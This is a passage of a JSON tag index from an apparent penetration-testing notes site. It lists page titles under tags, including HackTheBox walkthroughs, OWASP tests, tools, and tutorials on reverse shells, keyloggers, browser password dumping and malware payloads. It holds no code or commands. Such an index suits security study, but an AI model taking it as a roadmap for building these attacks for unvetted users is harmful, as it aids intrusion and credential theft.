                        ","tags":["tags"]},{"location":"tags/#port-8080","title":"port 8080","text":"
                        • 8080 JBoss AS Instance 6.1.0
                        ","tags":["tags"]},{"location":"tags/#port-873","title":"port 873","text":"
                        • 873 rsync
                        ","tags":["tags"]},{"location":"tags/#port-993","title":"port 993","text":"
                        • Ports 110, 143, 993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-995","title":"port 995","text":"
                        • Ports 110, 143, 993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-scanner","title":"port scanner","text":"
                        • Coding a reverse shell that scans ports
                        ","tags":["tags"]},{"location":"tags/#ports","title":"ports","text":"
                        • Well-known ports
                        ","tags":["tags"]},{"location":"tags/#post-exploitation","title":"post exploitation","text":"
                        • Empire
                        ","tags":["tags"]},{"location":"tags/#postgresql","title":"postgresql","text":"
                        • 5432 postgresql
                        • Walkthrough - A HackTheBox machine - Funnel
                        ","tags":["tags"]},{"location":"tags/#powershell","title":"powershell","text":"
                        • Azure PowerShell
                        ","tags":["tags"]},{"location":"tags/#privilege-escalation","title":"privilege escalation","text":"
                        • Configuration files
                        • Create a Registry
                        • Cron jobs - path, wildcards, file overwrite.
                        • Walkthrough - Included - A HackTheBox machine
                        • Index for Linux Privilege Escalation
                        • Index for Windows Privilege Escalation
                        • Kernel vulnerability exploitation
                        • linPEAS - A tool to scan Linux systems
                        • Linux exploit suggester
                        • Linux Privilege Checker
                        • lxd
                        • Pass The Hash
                        • PowerUp.ps1
                        • Process capabilities - getcap
                        • SSH keys
                        • Suid Binaries
                        • Windows binaries - LOLBAS
                        • Recently accessed files and executed commands
                        • winPEAS - Windows Privilege Escalation Awesome Scripts
                        • Privilege escalation - Weak service file permission
                        ","tags":["tags"]},{"location":"tags/#privileges-escalation","title":"privileges escalation","text":"
                        • Dirty COW (Copy On Write)
                        ","tags":["tags"]},{"location":"tags/#procesmonitor","title":"procesMonitor","text":"
                        • Information gathering phase - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#process-hacker-tool","title":"process hacker tool","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#proxy","title":"proxy","text":"
                        • 3128 squid
                        • Burpsuite
                        • Interactsh - An alternative to BurpSuite Collaborator
                        ","tags":["tags"]},{"location":"tags/#public-cloud","title":"public cloud","text":"
                        • Amazon Web Services (AWS) Essentials
                        • Google Cloud Platform Essentials
                        ","tags":["tags"]},{"location":"tags/#python","title":"python","text":"
                        • django pentesting
                        • Immunity Debugger
                        • noip
                        • pyftpdlib - An FTP server written in python
                        • pyinstaller
                        • Responder.py - An SMB server that listens for NTLM hashes
                        • Bypassing IPS with handmade XOR Encryption
                        • Bypassing Next Generation Firewalls
                        • Coding a data exfiltration script for an http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and a reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • DNS poisoning
                        • Dumping saved passwords from Google Chrome
                        • Hijack the Internet Explorer process to bypass a host-based firewall
                        • Hijacking Keepass Password Manager
                        • Including the cd command in a TCP reverse shell
                        • Taking a screenshot
                        • Making your binary persistent
                        • Man in the browser attack
                        • pip
                        • Privilege escalation - Weak service file permission
                        • Installing python
                        • Simple keylogger in python
                        • Python tools for pentesting
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tuning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#python-pentesting","title":"python pentesting","text":"
                        • Immunity Debugger
                        • Bypassing IPS with handmade XOR Encryption
                        • Bypassing Next Generation Firewalls
                        • Coding a data exfiltration script for an http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and a reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • DNS poisoning
                        • Dumping saved passwords from Google Chrome
                        • Hijack the Internet Explorer process to bypass a host-based firewall
                        • Hijacking Keepass Password Manager
                        • Including the cd command in a TCP reverse shell
                        • Taking a screenshot
                        • Making your binary persistent
                        • Man in the browser attack
                        • Privilege escalation - Weak service file permission
                        • Installing python
                        • Simple keylogger in python
                        • Python tools for pentesting
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tuning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#rce","title":"rce","text":"
                        • SirepRAT - RCE as SYSTEM on Windows IoT Core
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#rdp","title":"rdp","text":"
                        • 3389 RDP
                        • rdesktop
                        • xfreerdp
                        ","tags":["tags"]},{"location":"tags/#reconnaissance","title":"reconnaissance","text":"
                        • The ActiveDirectory PowerShell module
                        • BloodHound
                        • crt.sh
                        • dnscan - A DNS subdomain scanner
                        • feroxbuster - A web content enumeration tool for unreferenced resources
                        • fping - An improved ping tool
                        • Github dorks
                        • Google dorks
                        • grep
                        • HTTrack - A tool for mirroring sites
                        • masscan - An IP scanner
                        • Nessus
                        • netcraft
                        • netdiscover - A network enumeration tool based on ARP requests
                        • nikto
                        • nmap - A network exploration and security auditing tool
                        • OpenVAS
                        • openVAS Reporting
                        • p0f
                        • ping
                        • Powercat - An alternative to netcat coded in PowerShell
                        • SharpView
                        • sublist3r - A subdomain enumerating tool
                        • tcpdump - A command-line packet analyzer
                        • The Harvester - A tool for passive and active reconnaissance
                        • waybackurls
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        • Test Application Platform Configuration - OWASP Web Security Testing Guide
                        • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                        • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                        • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                        • Test HTTP Methods - OWASP Web Security Testing Guide
                        • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                        • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                        • Test File Permission - OWASP Web Security Testing Guide
                        • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                        • Test Cloud Storage - OWASP Web Security Testing Guide
                        • Testing for Content Security Policy - OWASP Web Security Testing Guide
                        • Test Path Confusion - OWASP Web Security Testing Guide
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        • Map Application architecture - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#redis","title":"redis","text":"
                        • 6379 redis
                        • Walkthrough - A HackTheBox machine - Redeemer
                        ","tags":["tags"]},{"location":"tags/#reflexil","title":"reflexil","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#registry","title":"registry","text":"
                        • Making your binary persistent
                        ","tags":["tags"]},{"location":"tags/#regshot","title":"regshot","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#relational","title":"relational","text":"
                        • sqlite
                        • Virtual environments
                        ","tags":["tags"]},{"location":"tags/#relational-database","title":"relational database","text":"
                        • MariaDB
                        • MySQL
                        ","tags":["tags"]},{"location":"tags/#reporting","title":"reporting","text":"
                        • openVAS Reporting
                        • xsltproc
                        ","tags":["tags"]},{"location":"tags/#resources","title":"resources","text":"
                        • LOLbins - Living off the land binaries - LOLBAS and GTFOBins
                        • Repo for legacy operating systems
                        • Index of downloads
                        ","tags":["tags"]},{"location":"tags/#responderpy","title":"responder.py","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#reverse-shell","title":"reverse shell","text":"
                        • Bank - A HackTheBox machine
                        • Base - A HackTheBox machine
                        • Nibbles - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        • pentestmonkey php reverse shell
                        • Coding a data exfiltration script for an http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and a reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • Hijack the Internet Explorer process to bypass a host-based firewall
                        • Including the cd command in a TCP reverse shell
                        • Taking a screenshot
                        • Making your binary persistent
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tuning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#reverse-shells","title":"reverse-shells","text":"
                        • Reverse Shells
                        • Web Shells
                        ","tags":["tags"]},{"location":"tags/#rpc","title":"rpc","text":"
                        • Port 111, 32731 - rpc
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#rsa","title":"rsa","text":"
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        ","tags":["tags"]},{"location":"tags/#rsync","title":"rsync","text":"
                        • 873 rsync
                        ","tags":["tags"]},{"location":"tags/#rules","title":"rules","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        ","tags":["tags"]},{"location":"tags/#rules-of-engagement","title":"rules of engagement","text":"
                        • Rules of Engagement - Checklist
                        ","tags":["tags"]},{"location":"tags/#s3","title":"s3","text":"
                        • AWS cli
                        ","tags":["tags"]},{"location":"tags/#samba","title":"samba","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#scanner","title":"scanner","text":"
                        • Nessus
                        • OpenVAS
                        • openVAS Reporting
                        ","tags":["tags"]},{"location":"tags/#scanning","title":"scanning","text":"
                        • Port 53 - Domain Name Server (DNS)
                        • crt.sh
                        • dnscan - A DNS subdomain scanner
                        • fping - An improved ping tool
                        • Github dorks
                        • Google dorks
                        • HTTrack - A tool for mirroring sites
                        • masscan - An IP scanner
                        • nmap - A network exploration and security auditing tool
                        • p0f
                        • ping
                        • Powercat - An alternative to netcat coded in PowerShell
                        • sublist3r - A subdomain enumerating tool
                        ","tags":["tags"]},{"location":"tags/#screenshot-capturer","title":"screenshot capturer","text":"
                        • Taking a screenshot
                        ","tags":["tags"]},{"location":"tags/#scripting","title":"scripting","text":"
                        • Bypassing IPS with handmade XOR Encryption
                        • Bypassing Next Generation Firewalls
                        • Coding a data exfiltration script for an http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and a reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • Dumping saved passwords from Google Chrome
                        • Hijack the Internet Explorer process to bypass a host-based firewall
                        • Hijacking Keepass Password Manager
                        • Including the cd command in a TCP reverse shell
                        • Taking a screenshot
                        • Making your binary persistent
                        • pip
                        • Privilege escalation - Weak service file permission
                        • Installing python
                        • Simple keylogger in python
                        • Python tools for pentesting
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tuning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#serialization-vulnerability","title":"serialization vulnerability","text":"
                        • Log4j
                        ","tags":["tags"]},{"location":"tags/#server","title":"server","text":"
                        • Responder.py - An SMB server that listens for NTLM hashes
                        • smbserver - from impacket
                        • uploadserver
                        • WebDAV - WsgiDAV - A generic and extendable WebDAV server
                        ","tags":["tags"]},{"location":"tags/#server-enumeration","title":"server enumeration","text":"
                        • httprint - A web server fingerprinting tool
                        ","tags":["tags"]},{"location":"tags/#servers","title":"servers","text":"
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • Setting up servers
                        ","tags":["tags"]},{"location":"tags/#services","title":"services","text":"
                        • Well-known ports
                        ","tags":["tags"]},{"location":"tags/#sheet","title":"sheet","text":"
                        • Pentesting Powerapp
                        ","tags":["tags"]},{"location":"tags/#shells","title":"shells","text":"
                        • msfvenom
                        • Spawn a shell
                        • Tmux - A terminal multiplexer
                        ","tags":["tags"]},{"location":"tags/#smb","title":"smb","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • Port 2049 - NFS Network File System
                        • Tactics - A HackTheBox machine
                        • ntlmrelayx - a module from Impacket
                        • PsExec - a module from Impacket
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#smb-vulnerability","title":"smb vulnerability","text":"
                        • Lame - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#snmp_1","title":"snmp","text":"
                        • braa - SNMP scanner
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • snmpwalk - SNMP scanner
                        ","tags":["tags"]},{"location":"tags/#soap","title":"soap","text":"
                        • Pentesting web services
                        ","tags":["tags"]},{"location":"tags/#sql_1","title":"sql","text":"
                        • Sequel - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#sql-injection","title":"sql injection","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#sqli","title":"sqli","text":"
                        • BurpSuite Labs - SQL injection
                        ","tags":["tags"]},{"location":"tags/#ssrf","title":"ssrf","text":"
                        • Gopherus
                        • BurpSuite Labs - Broken access control vulnerabilities
                        • BurpSuite Labs - Server Side Request Forgery
                        ","tags":["tags"]},{"location":"tags/#ssti","title":"ssti","text":"
                        • BurpSuite Labs - Server Side Template Injection
                        ","tags":["tags"]},{"location":"tags/#strings","title":"strings","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#subdomain","title":"subdomain","text":"
                        • Port 53 - Domain Name Server (DNS)
                        • crt.sh
                        • dnscan - A DNS subdomain scanner
                        ","tags":["tags"]},{"location":"tags/#subdomains","title":"subdomains","text":"
                        • sublist3r - A subdomain enumerating tool
                        ","tags":["tags"]},{"location":"tags/#suid-binaries","title":"suid binaries","text":"
                        • Bank - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#suid-binary","title":"suid binary","text":"
                        • Base - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#tcp","title":"tcp","text":"
                        • p0f
                        ","tags":["tags"]},{"location":"tags/#tcp-view","title":"tcp view","text":"
                        • Information gathering phase - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#techniques","title":"techniques","text":"
                        • Pentesting Tomcat
                        • DNS poisoning
                        • Man in the browser attack
                        ","tags":["tags"]},{"location":"tags/#telnet","title":"telnet","text":"
                        • 23 telnet
                        ","tags":["tags"]},{"location":"tags/#terminal","title":"terminal","text":"
                        • msfvenom
                        • Spawn a shell
                        • Tmux - A terminal multiplexer
                        ","tags":["tags"]},{"location":"tags/#tftp","title":"tftp","text":"
                        • 21 ftp
                        • Walkthrough - Included - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#thick-applications","title":"thick applications","text":"
                        • CFF explorer
                        • mitm_relay Suite
                        • SysInternals Suite
                        ","tags":["tags"]},{"location":"tags/#thick-client","title":"thick client","text":"
                        • Window Detective - A tool to view windows properties in the system
                        • winspy - A tool to view windows properties in the system
                        ","tags":["tags"]},{"location":"tags/#thick-client-application","title":"thick client application","text":"
                        • Process Hacker tool
                        ","tags":["tags"]},{"location":"tags/#thick-client-applications","title":"thick client applications","text":"
                        • Pentesting Thick client Applications - Introduction
                        • Attacking thick clients applications - Data storage issues
                        • Basic Lab Setup - Thick client Applications
                        • Common vulnerabilities
                        • First challenge - Enabling a button - Thick client Applications
                        • Information gathering phase - Thick client Applications
                        • Reversing and patching thick clients applications
                        • Traffic analysis - Thick client Applications
                        • Thick client Applications Pentesting Checklist
                        • Tools for pentesting thick client applications
                        ","tags":["tags"]},{"location":"tags/#thick-client-applications-pentesting","title":"thick client applications pentesting","text":"
                        • Pentesting Thick client Applications - Introduction
                        • Attacking thick clients applications - Data storage issues
                        • Basic Lab Setup - Thick client Applications
                        • Common vulnerabilities
                        • First challenge - Enabling a button - Thick client Applications
                        • Information gathering phase - Thick client Applications
                        • Reversing and patching thick clients applications
                        • Traffic analysis - Thick client Applications
                        • Thick client Applications Pentesting Checklist
                        • Tools for pentesting thick client applications
                        ","tags":["tags"]},{"location":"tags/#tool","title":"tool","text":"
                        • dirb - A web content enumeration tool
                        • feroxbuster - A web content enumeration tool for unreferenced resources
                        • Markdown
                        • postfix - A SMTP server
                        • xsltproc
                        ","tags":["tags"]},{"location":"tags/#tools","title":"toolS","text":"
                        • Network traffic capture tools
                        ","tags":["tags"]},{"location":"tags/#tools_1","title":"tools","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        • The ActiveDirectory PowerShell module
                        • Amass
                        • apktool
                        • arjun
                        • arpspoof from dsniff
                        • BeEF - The browser exploitation framework project
                        • BloodHound
                        • braa - SNMP scanner
                        • Pentesting browsers
                        • Burpsuite
                        • cewl - A custom dictionary generator
                        • Tools for cloning a site
                        • crunch - A dictionary generator
                        • crt.sh
                        • CUPP - Common User Password Profiler
                        • curl
                        • darkarmour
                        • Dictionaries or wordlists resources
                        • dig axfr
                        • dnsenum - A tool to enumerate DNS
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • evil-winrm
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • figlet
                        • Immunity Debugger
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • mythic
                        • nishang
                        • nslookup
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • Phpggc - A tool for PHP deserialization
                        • PowerUp.ps1
                        • rdesktop
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • rpcclient - A tool for interacting with smb shares
                        • Remote Server Administration Tools (RSAT)
                        • SharpView
                        • smbclient - A tool for interacting with smb shares
                        • smbmap
                        • snmpwalk - SNMP scanner
                        • sqlplus - To connect and manage the Oracle RDBMS
                        • sshpass - A program to pass passwords in the command line to ssh
                        • The Harvester - A tool for passive and active reconnaissance
                        • vnstat - Monitoring network impact
                        • waybackurls
                        • xfreerdp
                        • Ysoserial - A tool for Java deserialization
                        • Tools for pentesting thick client applications
                        • Creating malware and custom payloads
                        ","tags":["tags"]},{"location":"tags/#traffic-tool","title":"traffic tool","text":"
                        • CFF explorer
                        ","tags":["tags"]},{"location":"tags/#visual-code-grepper","title":"visual code grepper","text":"
                        • Common vulnerabilities
                        ","tags":["tags"]},{"location":"tags/#vpn","title":"vpn","text":"
                        • VPN notes
                        ","tags":["tags"]},{"location":"tags/#vsftpd","title":"vsFTPd","text":"
                        • 21 ftp
                        ","tags":["tags"]},{"location":"tags/#vulnerability","title":"vulnerability","text":"
                        • dirb - A web content enumeration tool
                        ","tags":["tags"]},{"location":"tags/#vulnerability-assessment","title":"vulnerability assessment","text":"
                        • Nessus
                        • OpenVAS
                        • openVAS Reporting
                        ","tags":["tags"]},{"location":"tags/#walkthrough","title":"walkthrough","text":"
                        • Appointment - A HackTheBox machine
                        • Archetype - A HackTheBox machine
                        • Bank - A HackTheBox machine
                        • Base - A HackTheBox machine
                        • Crocodile - A HackTheBox machine
                        • Explosion - A HackTheBox machine
                        • Walkthrough - Friendzone - A HackTheBox machine
                        • Walkthrough - A HackTheBox machine - Funnel
                        • Ignition - A HackTheBox machine
                        • Walkthrough - Included - A HackTheBox machine
                        • Lame - A HackTheBox machine
                        • Markup - A HackTheBox machine
                        • Walkthrough - Metatwo - A HackTheBox machine
                        • Walkthrough - A HackTheBox machine - Mongod
                        • Nibbles - A HackTheBox machine
                        • Nunchucks - A HackTheBox machine
                        • Walkthrough - Omni - A HackTheBox machine
                        • Oopsie - A HackTheBox machine
                        • Pennyworth - A HackTheBox machine
                        • Walkthrough - Photobomb - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        • Walkthrough - A HackTheBox machine - Redeemer
                        • Responder - A HackTheBox machine
                        • Sequel - A HackTheBox machine
                        • Walkthrough - Support - A HackTheBox machine
                        • Tactics - A HackTheBox machine
                        • Walkthrough - Trick - A HackTheBox machine
                        • Walkthrough - Unified - A HackTheBox machine
                        • Walkthrough - Usage - A HackTheBox machine
                        • Vaccine - A HackTheBox machine
                        • Walkthrough - GoldenEye 1, a vulnhub machine
                        • Vulnhub Raven 1
                        • Vulnhub Raven 2
                        • Index of walkthroughs
                        ","tags":["tags"]},{"location":"tags/#web","title":"web","text":"
                        • Gopherus
                        • Information gathering
                        • netcraft
                        • Reverse Shells
                        • Weevely - A PHP webshell backdoor generator
                        • OWASP Web Security Testing Guide
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        • Map Application architecture - OWASP Web Security Testing Guide
                        • Web Exploitation Guide
                        • Arbitrary file upload
                        • CSRF attack - Cross Site Request Forgery
                        • Insecure deserialization
                        • Json Web Token attacks
                        • NoSQL injection
                        ","tags":["tags"]},{"location":"tags/#web-enumeration","title":"web enumeration","text":"
                        • feroxbuster - A web content enumeration tool for unreferenced resources
                        ","tags":["tags"]},{"location":"tags/#web-pentesting","title":"web pentesting","text":"
                        • 22 ssh
                        • 3128 squid
                        • Aquatone - Automatize web scanner in large subdomain lists
                        • BeEF - The browser exploitation framework project
                        • Bind Shells
                        • Burpsuite
                        • cewl - A custom dictionary generator
                        • Tools for cloning a site
                        • crunch - A dictionary generator
                        • CUPP - Common User Password Profiler
                        • Dictionaries or wordlists resources
                        • django pentesting
                        • eWPT Preparation
                        • EyeWitness
                        • ffuf - A fast web fuzzer written in Go
                        • Responder - A HackTheBox machine
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • knockpy - A subdomain scanner
                        • Laudanum - Injectable Web Exploit Code
                        • Lazagne
                        • Log4j
                        • moodlescan
                        • nikto
                        • searchsploit
                        • sslyze - A tool for scanning certificates
                        • Pentesting Tomcat
                        • veil - A backdoor generator
                        • Vulnhub Raven 1
                        • Vulnhub Raven 2
                        • w3af
                        • WafW00f - A firewall scanner
                        • wfuzz
                        • whatweb - A web scanner
                        • wpscan - Wordpress Security Scanner
                        • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                        • Testing GraphQL - OWASP Web Security Testing Guide
                        • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                        • Testing for Default Credentials - OWASP Web Security Testing Guide
                        • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                        • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                        • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                        • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                        • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                        • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                        • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                        • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                        • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                        • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                        • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                        • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                        • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                        • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                        • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                        • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                        • Test Integrity Checks - OWASP Web Security Testing Guide
                        • Test for Process Timing - OWASP Web Security Testing Guide
                        • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                        • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                        • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                        • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                        • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                        • Test Payment Functionality - OWASP Web Security Testing Guide
                        • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                        • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                        • Testing for HTML Injection - OWASP Web Security Testing Guide
                        • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                        • Testing for CSS Injection - OWASP Web Security Testing Guide
                        • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                        • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                        • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                        • Testing for Clickjacking - OWASP Web Security Testing Guide
                        • Testing WebSockets - OWASP Web Security Testing Guide
                        • Testing Web Messaging - OWASP Web Security Testing Guide
                        • Testing Browser Storage - OWASP Web Security Testing Guide
                        • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                        • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        • Test Application Platform Configuration - OWASP Web Security Testing Guide
                        • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                        • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                        • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                        • Test HTTP Methods - OWASP Web Security Testing Guide
                        • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                        • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                        • Test File Permission - OWASP Web Security Testing Guide
                        • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                        • Test Cloud Storage - OWASP Web Security Testing Guide
                        • Testing for Content Security Policy - OWASP Web Security Testing Guide
                        • Test Path Confusion - OWASP Web Security Testing Guide
                        • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                        • Testing for Padding Oracle - OWASP Web Security Testing Guide
                        • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                        • Testing for Weak Encryption - OWASP Web Security Testing Guide
                        • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                        • Testing for Stack Traces - OWASP Web Security Testing Guide
                        • Test Role Definitions - OWASP Web Security Testing Guide
                        • Test User Registration Process - OWASP Web Security Testing Guide
                        • Test Account Provisioning Process - OWASP Web Security Testing Guide
                        • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                        • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                        • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                        • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
                        • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                        • Testing for SQL Injection - OWASP Web Security Testing Guide
                        • Testing for LDAP Injection - OWASP Web Security Testing Guide
                        • Testing for XML Injection - OWASP Web Security Testing Guide
                        • Testing for SSI Injection - OWASP Web Security Testing Guide
                        • Testing for XPath Injection - OWASP Web Security Testing Guide
                        • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                        • Testing for Code Injection - OWASP Web Security Testing Guide
                        • Testing for Command Injection - OWASP Web Security Testing Guide
                        • Testing for Format String Injection - OWASP Web Security Testing Guide
                        • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                        • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                        • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                        • Testing for Host Header Injection - OWASP Web Security Testing Guide
                        • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                        • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                        • Testing for Mass Assignment - OWASP Web Security Testing Guide
                        • Testing for Session Management Schema - OWASP Web Security Testing Guide
                        • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                        • Testing for Session Fixation - OWASP Web Security Testing Guide
                        • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                        • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                        • Testing for Logout Functionality - OWASP Web Security Testing Guide
                        • Testing Session Timeout - OWASP Web Security Testing Guide
                        • Testing for Session Puzzling - OWASP Web Security Testing Guide
                        • Testing for Session Hijacking - OWASP Web Security Testing Guide
                        • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                        • Broken access control
                        • Buffer Overflow attack
                        • Captcha Replay attack
                        • Carriage Return and Linefeed - CRLF Attack
                        • XFS attack - Cross-frame Scripting
                        • XSS attack - Cross-Site Scripting
                        • Directory Traversal attack
                        • LFI attack - Local File Inclusion
                        • Creating malware and custom payloads
                        • PHP Type Juggling Vulnerabilities
                        • RFD attack - Reflected File Download
                        • RCE attack - Remote Code Execution
                        • RFI attack - Remote File Inclusion
                        • SSRF attack - Server Side Request Forgery
                        • Server-side Template Injection - SSTI
                        • Session Puzzling - Session Variable Overloading
                        • SQL injection
